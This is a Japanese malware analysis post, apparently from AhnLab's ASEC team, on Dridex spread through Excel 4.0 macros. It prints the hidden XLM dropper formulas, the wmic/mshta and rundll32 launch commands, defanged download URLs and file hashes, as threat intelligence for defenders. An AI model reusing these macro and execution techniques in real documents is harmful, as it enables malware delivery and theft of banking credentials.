Excel 4.0 マクロによって拡散する Dridex

最近 ASEC 分析チームは、Excel ドキュメントによって Dridex の配布される方式が素早い周期で変化していることを確認した。昨年から Dridex の配布方式については ASEC ブログを通して紹介しており、最新のものは7月にタスクスケジューラを利用して Dridex を配布する Excel ドキュメントについて紹介している。現在拡散している Excel ドキュメントでは、以前とは異なる VBA マクロが使用されておらず、Excel 4.0 マクロのみが使用されている。このような変化はアンチウイルスの検知を回避するためのものと推定され、その変化の周期が短くなってきている。

最近拡散している Excel ドキュメントの実行画面は以下の通りである。様々な画像を利用し、ユーザーがマクロの有効化ボタンをクリックするように誘導している。

不正な行為に使用されるマクロは従来使用されていた VBA マクロではなく、Excel 4.0 マクロが使用されている。マクロを実行すると、非表示にされていたシートに存在する Auto_Open を介してそのセルにある数式が自動で実行され、不正な行為を実行する。

Auto_Open によって以下の順序通りに不正な数式マクロが実行され、不正なファイルの生成および実行の機能を行う。

• 不正な数式マクロ
  =FOPEN(GET.NOTE(Macro1!$A$3, 1, 200), 1+2)
  =FOR.CELL(“HdOrvNpzIeLysqA”,D160:AR521, TRUE)
  =FWRITE(B152,CHAR(HdOrvNpzIeLysqA))
  =NEXT()
  =FCLOSE(B152)
  =EXEC(GET.NOTE(Macro1!$A$4, 1, 200))

この時に使用される不正なデータは各セルに分散されており、セルのメモ機能を同時に使用する。このメモは非表示設定となっており Excel に表示されないが、以下のようにメモの表示機能を利用して不正なデータを確認できる。メモに保存されたデータはファイルが生成されるパスと、当該ファイルを実行するコマンドであり、生成されるファイルのデータは特定セル(D160:AR521)に10進数で保存されている。

生成された不正なファイルは ProgramData フォルダーに sct の拡張子で保存され、wmic コマンドによって実行される。

• ファイルの生成先パス
  C:\ProgramData\fCLjKsEAHjoxErF.sct
• ファイルの実行コマンド
  wmic process call create ‘mshta C:\ProgramData\fCLjKsEAHjoxErF.sct’

生成された sct ファイルの一部コードは以下の通りであり、多くのコメントによって難読化された状態である。sct ファイルを実行すると、ProgramData フォルダーに sct 拡張子のファイルを追加で生成する。追加で生成された sct ファイルは、以降生成される dll ファイルを実行する機能を行う。

以降、5つの url に接続を試み、不正なファイルをダウンロードして ProgramData フォルダーに dll の拡張子で保存される。ダウンロードされる dll は Dridex マルウェアと確認された。

• ダウンロード url
  hxxp://coldchallenge[.]xyz:8080/js/filler_dk9naf.png
  hxxp://updateviacloud[.]xyz:8080/files/filler_dk9naf.png
  hxxp://updateviacloud[.]xyz:8080/wp-heme/filler_dk9naf.png
  hxxp://updateviacloud[.]xyz:8080/js/filler_dk9naf.png
  hxxps://space.egematey[.]com/wp-content/cache/wpfc-mobile-cache/proclus-the-quaestor/amp/j4a42p0W.php

Dridex マルウェアをダウンロードした後、追加で生成された sct ファイルを実行する。

追加で生成された sct ファイルのコードの一部は、以下の通りである。実行すると wmic によってダウンロードされた Dridex マルウェアを実行する機能を行うが、そのコマンドは以下の通りである。

• ファイルの実行コマンド
  wmic process call create “rundll32.exe C:\\ProgramData\ljneLUpdLaTjomtIyXuy.dll GetDesktopDPI”

Dridex はバンキングマルウェアとして、バンキング関連のユーザー情報を収集し、ローダーを経てメインモジュールをダウンロードすることで、追加の不正な行為を行うことができる。過去、このマルウェアによって DopplePaymer、BitPaymer、CLOP ランサムウェア等が配布された履歴が存在する。また、Dridex を配布する Excel ドキュメントの変形が様々な形で持続的に発生しており、不正なマクロが含まれた Excel ファイルは主にスパムメールを通じて配布されているため、出どころが不明なファイルは実行してはならず、ユーザーの注意が必要である。

[ファイル検知]

• Downloader/XLS.Dridex
• Trojan/Win.BankerX-gen.R438509

 [IOC 情報]

• 2e118f4e98e8e41ece2be3a5b94245ba
• c7d07592916c5f79bf0dca4b9fccda50
• f71f826eb4d2700598476026fea1030e
• c4ac79f00a9958a719c850995f860d8d
• ab6b811f95b68076b5e5de338edb0f3c

 [Excel により配布された Dridex 関連の過去ブログ]

https://asec.ahnlab.com/jp/25408/
https://asec.ahnlab.com/ko/1344/(韓国語のみ)
https://asec.ahnlab.com/jp/21849/

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。